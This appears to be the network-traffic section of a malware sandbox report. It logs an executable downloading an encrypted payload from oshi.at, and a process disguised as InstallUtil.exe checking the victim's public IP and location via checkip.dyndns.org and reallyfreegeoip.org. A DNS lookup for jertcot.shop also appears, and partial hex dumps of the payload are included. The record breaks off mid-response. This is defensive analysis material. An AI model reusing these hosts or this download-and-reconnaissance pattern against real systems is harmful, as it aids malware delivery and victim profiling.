Jan 14, 2025 14:22:55.689745903 CET	53	57433	1.1.1.1	192.168.2.7
Jan 14, 2025 14:23:09.226655960 CET	63335	53	192.168.2.7	1.1.1.1
Jan 14, 2025 14:23:09.233853102 CET	53	63335	1.1.1.1	192.168.2.7
Jan 14, 2025 14:23:09.853463888 CET	55359	53	192.168.2.7	1.1.1.1
Jan 14, 2025 14:23:09.861190081 CET	53	55359	1.1.1.1	192.168.2.7
Jan 14, 2025 14:23:16.524451971 CET	49719	53	192.168.2.7	1.1.1.1
Jan 14, 2025 14:23:16.536247969 CET	53	49719	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 14:22:55.681185007 CET	192.168.2.7	1.1.1.1	0xa9c8	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.226655960 CET	192.168.2.7	1.1.1.1	0xb525	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.853463888 CET	192.168.2.7	1.1.1.1	0x4997	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:16.524451971 CET	192.168.2.7	1.1.1.1	0x4d88	Standard query (0)	jertcot.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 14:22:55.689745903 CET	1.1.1.1	192.168.2.7	0xa9c8	No error (0)	oshi.at		194.15.112.248	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.233853102 CET	1.1.1.1	192.168.2.7	0xb525	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:09.861190081 CET	1.1.1.1	192.168.2.7	0x4997	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:23:16.536247969 CET	1.1.1.1	192.168.2.7	0x4d88	No error (0)	jertcot.shop		162.254.34.31	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

oshi.at

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49736	193.122.130.0	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:23:09.245731115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:23:09.700246096 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c8c7dc467db8b151e9bc46d2ec36fe0b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:23:09.705372095 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:23:09.851670980 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3d60069ce5fddaed6316cd45dbe90e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:23:16.397912979 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:23:16.515964031 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 78b0dc8427877cb991d9fa9b9745cad1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49888	193.122.130.0	80	7988	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:23:36.705039024 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:23:37.170123100 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a253ee5890a17831b3104eb20879da6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:23:37.173716068 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:23:37.277646065 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 109cf4280ef184d7a6581b0563bbd821 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:23:44.051229954 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:23:44.154553890 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 29309a45e735ddf5ea29a2609ea35aea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	194.15.112.248	443	6920	C:\Users\user\Desktop\50201668.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:22:57 UTC	186	OUT	GET /Xkqu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: oshi.at Connection: Keep-Alive
2025-01-14 13:22:57 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Jan 2025 13:22:57 GMT Content-Type: application/octet-stream Content-Length: 1043976 Connection: close Content-Disposition: attachment; filename=dJXL.dat ETag: "c0d64ecd447d49a630f4bac00aee85af" Accept-Ranges: bytes Last-Modified: Mon, 13 Jan 2025 23:40:46 GMT
2025-01-14 13:22:57 UTC	3766	IN	Data Raw: de af 27 6b 6c 49 5a 78 12 95 f0 06 60 84 5b f1 4e ed f1 ec 3d 15 ef 25 29 a6 d2 f1 02 8d 35 b8 28 db 8b 68 60 47 41 02 f9 75 da ec 63 dd 90 c1 8c de 12 c9 d6 83 7a 1a 2d 28 7e 99 00 1c 09 11 3a 87 65 bd f9 98 be 51 0f 55 19 9a fe be 14 b8 06 5a 75 81 95 8f f3 39 67 1a dc 80 3c f6 02 c9 d3 ef 3a 54 f8 57 24 61 0d 27 37 b1 49 f4 d0 f1 b8 5f a0 b0 85 bb 40 08 95 38 60 f7 93 54 2e 1e 52 fa b4 9d 1c fd 1b 8b 16 21 bb b4 d5 53 88 74 69 33 03 27 98 d7 9b 59 a7 82 71 c2 3c 56 7f e4 67 40 8c 1d 2c ff 12 01 3f 3e ac 3d de e1 b1 35 1d 15 34 b0 95 9c 5f 64 86 1e 58 9d 0c de aa e8 6b ac 0a cc a2 5c 4f 65 2c 2e 8b f4 37 d6 a5 da d5 36 50 da 57 e8 c6 4e 5c 60 3e 6d b0 51 32 25 cc be 61 a6 e3 ae 49 0e f7 9d e4 62 44 81 e4 46 2c 60 47 9f 0c 67 3e a9 51 75 7d 89 9e 9b 41 Data Ascii: 'klIZx`[N=%)5(h`GAucz-(~:eQUZu9g<:TW$a'7I_@8`T.R!Sti3'Yq<Vg@,?>=54_dXk\Oe,.76PWN\`>mQ2%aIbDF,`Gg>Qu}A
2025-01-14 13:22:57 UTC	4096	IN	Data Raw: ec 63 22 84 66 1f 34 c3 fb e2 d6 f7 d1 6a e4 b1 36 92 75 8e 08 5a 31 35 a2 fd 9f 96 4e ec 94 7e 83 49 38 05 88 7b 08 ba 72 0a 9f 3b e0 34 18 62 3b 2a ff 0b c6 a3 30 dd 68 2a 63 ac 63 66 eb e2 8d 48 76 9b 89 ce 91 80 f8 fb ce 3c a1 09 51 48 09 a6 a4 7f 9b 2f 7e d1 d2 8d 37 4d 62 be c8 a7 82 db ba 3d 76 1d 81 2a 96 44 e6 f8 bd ac d3 4c a5 99 9c 76 57 c1 31 51 77 c3 af 02 0b 88 54 77 e4 60 2c 7c 4d 25 19 52 43 55 6d 1d 53 eb de 01 71 20 87 85 b3 a6 77 e3 af c3 e0 d2 14 8b 4e 44 b5 f3 8f 37 19 c7 c7 dc a6 36 00 b2 39 d7 d8 43 d0 7c 84 b7 d6 a8 ac 1d 27 b5 20 03 0c e1 8c 31 5d 59 bb d2 e1 9b f5 ec f5 4a ff 5e c8 18 20 b5 2b 80 57 06 8d a9 8b 3a 40 c6 f3 9b d2 d9 d2 18 83 e0 e1 f7 f7 90 a8 8f 66 1e e0 74 40 9a 35 0d d6 ac ef 89 2c d4 c9 34 94 86 02 07 8f 13 54 Data Ascii: c"f4j6uZ15N~I8{r;4b;0hccfHv<QH/~7Mb=v*DLvW1QwTw`,\|M%RCUmSq wND769C\|' 1]YJ^ +W:@ft@5,4T
2025-01-14 13:22:57 UTC	2523	IN	Data Raw: 62 cd 10 08 7e ba aa 39 1a 78 3d 04 84 12 e9 3e 1a 93 03 19 8f 00 3a 71 cd f6 55 9b 31 92 54 8d 59 1f 7a bf 9c be 76 e1 a2 02 8a 1c 16 31 d8 6a bc 2f ec 2b 3f 66 7e 1d 94 5e 0d 77 7d c8 d8 59 f3 c6 2c 04 16 21 9c e3 6b 48 7e 3a 5e fd 19 71 ae 1d e6 c6 a3 e7 8e 36 95 7a 7a dd 3a 8f 9e 5f a6 11 79 93 88 0f 0c e3 89 a7 5e 5c 2d c1 fe 50 57 c0 8b ea 35 5d 23 ab 8e 98 43 25 89 4d fb 09 26 c6 40 63 f4 52 9b 0b 56 b0 ab ec f8 a3 51 03 e9 c4 1a 4b 0e df ae fb 8f b3 c9 30 b7 0f 93 fa 5a e8 a1 b4 d1 21 ed ed 2e 72 fc c1 73 d8 5a 42 c3 29 23 0d b9 f2 26 61 bc c2 e1 ec 56 5a 90 79 85 71 bb 0d 49 35 a7 8a 1c 7e 6c df 3e a9 62 ce 59 5b 16 ed 06 c8 ee d2 46 bf 40 ad 32 db 3d c1 53 7d 9e 3c 04 e5 f9 78 d7 5c 7b 4b ed bf d0 82 56 38 bd 21 c7 7d b9 c5 8b 90 02 f9 e9 86 80 Data Ascii: b~9x=>:qU1TYzv1j/+?f~^w}Y,!kH~:^q6zz:_y^\-PW5]#C%M&@cRVQK0Z!.rsZB)#&aVZyqI5~l>bY[F@2=S}<x\{KV8!}
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: 5e 6b 3d 9f d9 76 ae d5 7c 56 f2 07 f2 bc 34 9b 5d ae 16 70 be ba 45 38 a8 e7 8f 74 33 e5 db 83 36 ff e6 28 47 14 91 9f 7b 81 1e bf 47 7b 5b 60 9e 7b 69 c2 00 89 c1 92 6b 4b d7 8d d3 b9 00 54 58 71 b7 05 2f 74 a7 73 1f 02 5f 20 2a cf 8d 58 34 63 a4 4d 40 9d 94 3c 56 53 00 1b a6 74 82 d4 1f a1 76 a3 ac 98 54 e1 c6 e2 ae de 9a ba 13 46 43 53 4f af e4 2e c5 75 75 7f 69 0f 30 ea 75 96 9e 49 72 50 b1 59 90 f6 8f 93 0e 36 23 39 53 b5 32 ae f8 7d 91 af b8 29 a9 c6 f2 01 fe c5 04 db 1b e2 51 16 31 fe 02 65 ce fb 72 55 64 90 21 09 78 2b db 09 75 f3 60 80 c6 0b da 19 99 74 f5 5f 9d 56 25 bb 03 3c c8 23 25 95 00 c6 b9 16 94 c2 76 f5 65 a7 fd 61 39 7b ec 04 a6 90 21 cf 5a 18 db 16 c5 44 26 bb 5d 6a 55 e0 be 6b bb 5c 3a 54 73 39 5a 0e 03 ce 3e ca 3b 35 ea ed a7 17 ed Data Ascii: ^k=v\|V4]pE8t36(G{G{[`{ikKTXq/ts_ *X4cM@<VStvTFCSO.uui0uIrPY6#9S2})Q1erUd!x+u`t_V%<#%vea9{!ZD&]jUk\:Ts9Z>;5
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: fb 53 a9 5d 40 91 82 4f 8b d1 6a fc 6a 42 1a 30 b9 be 82 d3 7f a3 92 3c a2 bd 4b b8 37 7d 7e 8d 58 31 03 29 36 03 3a ec 3f 93 5a 1c 6f 63 1c 84 f2 ed 33 cf a2 5e 44 e0 1d e4 57 c3 a7 32 e5 fd 29 23 6d 3c ec 18 2f d9 38 7f 5a ce 23 29 a5 7e f9 ce 8d 58 40 f9 74 b5 ab 37 2d ef a9 99 8e f6 33 70 dc 59 f3 3d b4 f1 ff 3a 05 02 82 5c 7f fa b5 1d b4 f4 0d 39 59 1c 4c 8d 64 be 8f 97 c6 8e e7 66 ca 5b fc de 32 65 e6 7f 80 59 95 11 df 7e 68 29 33 c6 1e 65 16 0c 28 fc ac d5 32 9f 4e 0f a3 2d d4 8e 20 30 58 70 7d 0e d5 ec 97 9f f9 66 3d 0e 62 73 6b 85 16 5d fe 11 22 34 91 02 27 a4 35 73 61 1c fb a8 91 b4 e2 25 ba 24 5e 6e 1e fb 1e cf 00 01 25 c6 c7 8e bb 3b 4d d3 c1 53 66 f4 cb 0a 1d f4 ef ec 84 da d3 aa a5 ef 2a 6d 8f 27 e7 d0 9d 9a cf bd 18 aa 27 1f c3 ed 1f 0a 6a Data Ascii: S]@OjjB0<K7}~X1)6:?Zoc3^DW2)#m</8Z#)~X@t7-3pY=:\9YLdf[2eY~h)3e(2N- 0Xp}f=bsk]"4'5sa%$^n%;MSf*m''j
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: 58 ba ad 5d 24 dd b7 5a 11 4b 8f c2 72 a0 02 20 e2 5c 56 7f 4c 44 78 d9 91 6f 76 43 ee 84 5c 82 ec 83 c8 ea 25 70 5a 35 00 dd 4c dc 07 71 5c 59 00 42 5c bf 7b cd 54 f8 7c 83 2a 2a b4 35 08 8a b9 b4 42 34 4d 4f 24 01 1b 41 9e 02 da 52 f1 e3 71 e1 29 15 94 51 f5 17 ec d0 e9 db 66 31 cc 88 7a d1 f7 9b c3 51 db da ce 91 fe 98 d3 e2 58 1e e8 72 2b 3a 66 88 22 88 5f ee a4 06 ce b6 c5 1c 40 c0 bf 3d 8a 20 3f cf 18 c2 57 d8 c2 8d 62 e1 a0 a0 80 59 c3 6d b7 b2 f1 d5 32 80 4f 4e a9 0f 3e 4e 93 ea 70 21 84 32 4d 7b 3c 35 05 e7 7c da 8d 72 58 f6 9d 86 f6 f3 43 56 e7 4b 91 6e e7 db 51 13 50 66 ae 81 57 02 52 92 c9 2c 57 f3 0b 98 d7 03 61 fc f5 36 f2 86 f1 2b 64 21 0b ba 23 1d 8e 35 5c 1d 59 74 c3 9b fd 42 f4 34 b9 a4 d9 b1 b3 3d 50 78 46 d5 e9 e9 10 d4 9a 77 87 e1 a3 Data Ascii: X]$ZKr \VLDxovC\%pZ5Lq\YB\{T\|**5B4MO$ARq)Qf1zQXr+:f"_@= ?WbYm2ON>Np!2M{<5\|rXCVKnQPfWR,Wa6+d!#5\YtB4=PxFw
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: 20 75 ac 53 83 31 64 60 d8 73 26 1f bc 38 c2 ab 75 58 1d bd 46 c7 cd 9d 86 34 4b 1e 91 73 8a bd 6b 3c 59 e6 86 08 53 a2 39 13 bc a9 f0 09 fd 38 d6 d2 70 15 eb 8e 40 c9 d0 8a 9e 3b c8 0a df 57 e7 d2 6f 4b cc c8 cb 2d d9 59 d0 81 6e 4e ee 54 86 36 28 18 46 78 79 fa 26 da de b3 34 b2 65 ff 74 48 d3 de 21 e5 fc fc 9c 3c 07 6a 0c c7 ab f0 b2 50 4d 0d cc 34 86 6c bb c9 0e 35 43 14 0c ac 4f 84 c0 e6 f0 34 6e 8e b5 a8 a7 96 97 d2 aa 7b 11 f5 f9 93 b2 0d 07 ed 2d 6b 83 8e 93 b9 53 4c ca ab 33 9f c9 dc d4 00 68 4d d4 df d1 16 7c f2 6a a3 6e f9 1f 4d d2 a9 c7 66 10 7e c9 06 ce 70 4b 6d 88 1e a1 02 5c c6 27 99 f0 be 0a cd 41 a1 a0 c6 97 b0 81 b2 6b 84 d9 50 9d dc ff 8f db 50 28 c4 86 8f 71 04 f8 aa 52 c8 91 57 87 23 2a e8 c0 88 57 17 6a 5f 32 d3 fd 9a 18 8a 6b f3 c7 Data Ascii: uS1d`s&8uXF4Ksk<YS98p@;WoK-YnNT6(Fxy&4etH!<jPM4l5CO4n{-kSL3hM\|jnMf~pKm\'AkPP(qRW#*Wj_2k
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: 8b 1f b3 46 dd 56 7d cc d2 e5 42 8e 5b 51 5b 41 d6 19 54 c8 d4 9a 20 df 48 cd 7e 59 e2 68 25 bf 0c d6 23 db 95 12 ff 4d 10 3c df ea c0 89 8b c5 30 4e 0d fb b1 da cd 97 2f f8 bb 9d 4f eb 9d c7 a5 f2 d3 7d 7f 73 9e ac b9 c2 23 b8 2f 9d 5f d2 ac 7f c5 bb 5e e7 8d 50 bc 96 06 ac 31 d2 44 1a f2 f4 c1 e2 6f 6a 2e 36 07 94 b7 97 bb a4 44 4d 31 a6 df 36 51 37 17 f5 12 0d 1e a1 6d e0 8e 8d 1d 16 09 3a cf 30 b6 54 a1 4d 03 a4 5b 09 eb 59 bb ef 7e a8 99 df a6 39 35 f3 50 0d 6e d6 18 9d 4b b8 27 11 33 dd d9 d1 71 f0 62 cf e6 67 04 2c da 6c aa ea 98 70 03 cd cc fd 7b 40 e2 b8 25 a4 1b 6a dc 77 2e be 20 63 4a b9 37 c0 8b 73 dd fb b0 3e 55 a3 12 52 6c 9d 70 5e df 2a 80 26 f9 b9 f0 51 74 08 10 28 b2 18 dd 99 53 5c f4 53 51 9c 4b dd 2d 2a 00 43 ab f3 af f4 1d 44 20 90 0c Data Ascii: FV}B[Q[AT H~Yh%#M<0N/O}s#/_^P1Doj.6DM16Q7m:0TM[Y~95PnK'3qbg,lp{@%jw. cJ7s>URlp^&Qt(S\SQK-CD
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: f1 e4 eb 04 8f 00 73 6f 2f 67 f9 f6 71 37 f5 5d 9d 4b de 94 0b 15 06 8c 88 4a a4 dd 2c 7c c2 f2 c6 96 5c ff 20 30 68 45 2e 5b 2c 8e 19 8c 1c 61 dd 73 9b cd 89 6b f9 dd c3 6d a2 ba d7 7f 00 bb 0c e2 bf fd 4a fb 2c 58 68 8f 69 c5 d4 d0 27 4a e3 8e bd 37 7b 51 c2 6b 61 81 97 55 9f b7 10 76 dc 2c 8a 5f 07 9b f4 8c 10 2d 89 2d 57 97 7d 92 44 76 b3 9b 23 01 a0 8d 43 f8 21 83 23 76 19 1c 3d 3f 94 3f 8e a6 9d 93 20 8f d8 31 ab 60 82 99 75 98 5e 81 d7 0f 9b 80 ca 0f 6f 70 df 02 4a 3d 89 f7 1c 80 f2 af e0 70 7a 23 27 92 bb 45 d3 a5 5a 2d 37 f1 2d 09 b5 85 7a e4 16 b6 4a b4 bb 8d e8 0f 33 81 54 fc e4 dd 5e 2a 55 3d ac 5f 13 58 60 0a 05 de 90 8f 89 8d a1 de c4 d3 d7 53 11 07 ae b8 23 c4 57 cb ed bb 30 8f cf 10 d1 98 9b dd a8 cc bb 53 ae aa f3 77 32 37 4f a0 e4 1d 53 Data Ascii: so/gq7]KJ,\|\ 0hE.[,askmJ,Xhi'J7{QkaUv,_--W}Dv#C!#v=?? 1`u^opJ=pz#'EZ-7-zJ3T^*U=_X`S#W0Sw27OS
2025-01-14 13:22:58 UTC	4096	IN	Data Raw: 96 ca a9 b0 af ba 8e 92 6e 76 5b f5 59 46 93 11 74 25 c2 87 a5 73 a5 59 56 13 d5 2b f3 ca a9 f5 13 f2 20 20 66 f8 7a a7 4c bf 42 19 d4 b9 74 19 04 bc 6a 8e f6 c5 6e 2e 44 90 7c 1b 9d a8 ae c9 3e a0 ad e0 f9 db 82 e2 2d a4 9a 96 c1 a5 e3 8b 6d 5b f8 d5 ce c7 c1 b9 ba 43 a6 df d2 d5 89 10 17 1f fa cb 76 c8 c9 e3 bc 96 62 3e e0 00 87 d0 d3 89 71 35 ed 9b 3f cd 86 17 4d 7f 87 aa 07 3c fa 3d dd d5 83 af 0f 22 fb 61 e2 5f 3f a1 30 1d 56 4a 57 27 5f 14 20 f9 4b 61 f1 27 58 36 fc 5b 98 d5 bb 59 49 d6 ee 25 32 77 5e 40 0a 43 49 86 c7 ce a3 9a da eb 56 c2 ca c3 bb 2b 9d e9 a5 a1 55 e7 6b 80 68 58 ad aa 3c 7a c1 1b 39 74 58 98 ea 90 ad ef 93 1e 3d c7 45 79 8a 9d 91 ae 3c 37 36 ef 6a cd 37 3c 27 62 e6 c0 73 7f 96 39 16 de bd 0e 09 90 92 39 08 20 eb a8 e1 41 f0 84 76 Data Ascii: nv[YFt%sYV+ fzLBtjn.D\|>-m[Cvb>q5?M<="a_?0VJW'_ Ka'X6[YI%2w^@CIV+UkhX<z9tX=Ey<76j7<'bs99 Av

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49741	104.21.64.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:23:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:23:10 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175780 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wG43YaUSDkfWfobodELQgfwi1za2wLLUD0p7IbkLOrDec%2B22km3WWdQrd4ydjEfFwVMQ3%2Fr6Y3WhEwbgYqz7MRTrYmjGIRw3cbw%2BaSUKQQf26x%2BXSVDHhsN35p%2FgWv1rAOHR4yUR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901df06928f88ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2012&rtt_var=763&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1425781&cwnd=168&unsent_bytes=0&cid=352d33456746b121&ts=638&x=0"
2025-01-14 13:23:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 